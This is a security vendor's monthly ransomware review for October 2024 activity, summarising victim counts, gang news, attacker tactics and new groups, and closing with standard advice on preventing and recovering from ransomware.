
Ransomware review: November 2024
In October 2024 we recorded a total of 575 ransomware victims, a new high for this year.
This article is based on research by Marcelo Rivero, Malwarebytes’ ransomware specialist, who monitors information published by ransomware gangs on their Dark Web sites. In this report, “known attacks” are those where the victim did not pay a ransom. This provides the best overall picture of ransomware activity, but the true number of attacks is far higher.
In October 2024, we recorded a total of 575 ransomware victims, which is a new high for the year.

LockBit was again in the news when police unmasked Aleksandr Ryzhenkov as an Evil Corp member and LockBit affiliate. In an unexpected turn of events, Russia sentenced Aleksandr and three other members of the ransomware gang REvil to multiple years in prison for charges related to hacking and money laundering.
The relatively recently emerged Trinity ransomware gang has already made enough waves to attract a dedicated federal warning aimed at the healthcare industry.
Black Basta ransomware have been spotted using Microsoft Teams chat messages to engage with prospective targets and using malicious QR codes to facilitate initial access by redirecting them to a fraudulent domain. Our own analysts detailed how the group used a PowerShell command to hide Cobalt Strike beacons in memory.
Elsewhere, researchers noticed a series of attacks exploiting a known vulnerability in Veeam, some of which dropped Fog ransomware. Ransomware attacks involving Akira and Fog families have also taken advantage of systems running SonicWall SSL VPNs that are unpatched against CVE-2024-40766.
The US remains the most targeted country, and in October 2024 the number of known attacks exceeded the rest of the world combined.

Services remains the most attacked sector, but the rise in attacks on manufacturing continues, pushing it into second place globally.

In other ransomware related news, Australia has introduced its first standalone cybersecurity law, which requires certain businesses to report ransom payments.
New ransomware gangs
BASHE

BASHE is widely seen as a LockBit spin-off but likes to regard itself as an Advanced Persistent Threat (APT). The group’s activities have reportedly impacted organizations across North America, the United Kingdom, France, Germany, India, and Australia.
Nitrogen

The Nitrogen initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads. To focus on IT professionals they impersonate popular software like AnyDesk, Cisco AnyConnect VPN, TreeSize Free, and WinSCP.
Sarcoma Group

New as the Sarcoma group may be, they have already made it into the top five for October with 41 known attacks.
How to avoid ransomware
- Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
- Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
- Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
- Stop malicious encryption. Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
- Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
- Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.